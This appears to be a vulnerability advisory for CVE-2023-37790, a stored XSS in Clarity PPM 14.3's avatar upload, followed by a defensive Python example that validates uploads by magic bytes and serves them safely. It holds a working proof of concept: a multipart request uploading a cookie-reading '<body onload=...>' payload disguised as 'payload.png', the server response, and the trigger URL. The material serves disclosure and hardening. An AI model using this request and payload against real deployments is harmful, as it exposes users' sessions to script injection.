CVE-2023-37790: Clarity PPM 14.3.0.298 Cross Site Scripting ≈ Packet Storm

Jaspersoft Clarity PPM version 14.3.0.298 was discovered to contain an arbitrary file upload vulnerability via the Profile Picture Upload function.


==================================================================================================================================

Title : Insufficient input validation in CA PPM 14.3 allows remote attackers to execute stored cross-site scripting attacks.

Author : Kaizen

Tested on : Windows 10 / browser : Chrome Version 114.0.5735.133 (Official Build) (x86_64)

Vendor : https://www.broadcom.com/

Dork : https://www.broadcom.com/products/software/value-stream-management/clarity

#Affected Product Version: Clarity PPM 14.3.0.298 / Jaspersoft
#CVE Assigned: CVE-2023-37790
==================================================================================================================================

POC:

Header: Content-Type: text/html; charset=utf-8

Payload: <body onload=alert(document.cookie)>

HTTP Request:
POST /niku/nu?uitk.vxml.form=1&action=projmgr.avatarPhotoUpload&2097152&Error%20CMN-01035:%20The%20file%20size%20exceeds%202%20MB%20limit%20or%20file%20type%20is%20not%20supported.%20Please%20try%20again.&uitk.navigation.location=Modal&uitk.navigation.parent.location=Modal&uitk.navigation.last.workspace.action=npt.overview HTTP/1.1

[REDACTED]

------WebKitFormBoundaryr7Mas24AkgGJH4HE
Content-Disposition: form-data; name="avatar_photo"

------WebKitFormBoundaryr7Mas24AkgGJH4HE
Content-Disposition: form-data; name="avatar_photo_ODF_New_Attachment_File_Name"; filename="payload.png"
Content-Type: text/html; charset=utf-8

<body onload=alert(document.cookie)>
------WebKitFormBoundaryr7Mas24AkgGJH4HE
Content-Disposition: form-data; name="superSecretTokenKey"

superSecretTokenValue
------WebKitFormBoundaryr7Mas24AkgGJH4HE--

HTTP Response:

HTTP/1.1 200 OK
content-disposition: inline;filename="payload.png"
Content-Type: text/html;charset=utf-8
Content-Length: 90
Date: Thu, 06 Jul 2023 07:33:24 GMT
Connection: close
Server: CA PPM

<body onload=alert(document.cookie)>

To trigger the stored XSS, open the uploaded profile picture through the file-view endpoint; the server returns the stored bytes with the client-supplied Content-Type (text/html), so the browser renders the payload in the application's origin:

https://127.0.0.1/niku/app?action=union.viewODFFile&objectType=resource&odf_pk=5763513&fileId=5178985&versionId=51[REDACTED]hXm0r7tSeUqEr=true
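The PoC above chains two server-side defects: the avatar upload accepts a file named `payload.png` whose bytes are HTML, and the download endpoint echoes the Content-Type the client declared at upload time. The following added example (not vendor code; every function name here is hypothetical) shows the checks a hardened upload and download path would apply: the stored content type is derived from the file's magic bytes, the client's Content-Type header and extension are never trusted, and the file is served as an attachment with `X-Content-Type-Options: nosniff`. The advisory's own request body is used as a constructed input to show it being rejected.

```python
"""Hardened avatar upload/download handling (added example, not the product's code).

The two defects the advisory demonstrates are closed here by:
  * deriving the content type from the file's leading bytes, never from the
    client's Content-Type header or the filename;
  * storing only a small allowlist of image formats;
  * serving with a server-chosen Content-Type, as an attachment, plus nosniff.
All names are hypothetical; the page does not show the real product's API.
"""
from dataclasses import dataclass
import re
from typing import Optional

# Leading bytes ("magic") of the image formats an avatar may use.
MAGIC_TO_MIME = {
    b"\x89PNG\r\n\x1a\n": "image/png",
    b"\xff\xd8\xff": "image/jpeg",
    b"GIF87a": "image/gif",
    b"GIF89a": "image/gif",
}
ALLOWED_EXTENSIONS = {
    "image/png": {".png"},
    "image/jpeg": {".jpg", ".jpeg"},
    "image/gif": {".gif"},
}
MAX_AVATAR_BYTES = 2 * 1024 * 1024  # the 2 MB limit named in the advisory's error text
SAFE_FILENAME = re.compile(r"^[A-Za-z0-9_.-]{1,64}$")


class UploadRejected(ValueError):
    """Raised when an upload fails validation."""


def sniff_image_type(data: bytes) -> Optional[str]:
    """Return the MIME type implied by the file's magic bytes, or None."""
    for magic, mime in MAGIC_TO_MIME.items():
        if data.startswith(magic):
            return mime
    return None


@dataclass(frozen=True)
class StoredAvatar:
    filename: str
    content_type: str  # decided by the server from the bytes, not by the client
    data: bytes


def validate_avatar_upload(filename: str, declared_content_type: str, data: bytes) -> StoredAvatar:
    """Validate an upload. The client's declared content type is deliberately ignored."""
    if not data or len(data) > MAX_AVATAR_BYTES:
        raise UploadRejected("file is empty or exceeds the size limit")
    if not SAFE_FILENAME.match(filename):
        raise UploadRejected("unsafe filename")
    sniffed = sniff_image_type(data)
    if sniffed is None:
        raise UploadRejected("file content is not a supported image")
    # The extension must agree with what the bytes actually are (no 'payload.png' holding HTML).
    if not any(filename.lower().endswith(ext) for ext in ALLOWED_EXTENSIONS[sniffed]):
        raise UploadRejected("filename extension does not match file content")
    return StoredAvatar(filename=filename, content_type=sniffed, data=data)


def download_headers(avatar: StoredAvatar) -> dict:
    """Response headers for serving a stored avatar; nothing here is client-controlled."""
    return {
        "Content-Type": avatar.content_type,
        "Content-Disposition": f'attachment; filename="{avatar.filename}"',
        "X-Content-Type-Options": "nosniff",
        "Content-Length": str(len(avatar.data)),
        # Defence in depth: if the bytes were ever rendered, no script could run in the app origin.
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }


# Constructed inputs: the advisory's multipart part, and a minimal genuine PNG header
# uploaded with the same bogus text/html declaration.
ADVISORY_UPLOAD = ("payload.png", "text/html; charset=utf-8", b"<body onload=alert(document.cookie)>")
GENUINE_PNG = ("avatar.png", "text/html; charset=utf-8", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16)


def check_upload(upload) -> str:
    """Return 'rejected' or the server-decided content type of an accepted upload."""
    try:
        return validate_avatar_upload(*upload).content_type
    except UploadRejected:
        return "rejected"


if __name__ == "__main__":
    print(check_upload(ADVISORY_UPLOAD))  # rejected
    print(check_upload(GENUINE_PNG))      # image/png (the declared text/html is ignored)
    print(download_headers(validate_avatar_upload(*GENUINE_PNG)))
```

The two checks that matter for this CVE are the magic-byte sniff (which refuses the HTML body regardless of its `.png` name) and `download_headers`, which never copies the upload's Content-Type into the response; the PoC response in the advisory shows exactly that copy (`Content-Type: text/html;charset=utf-8`, `content-disposition: inline`).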
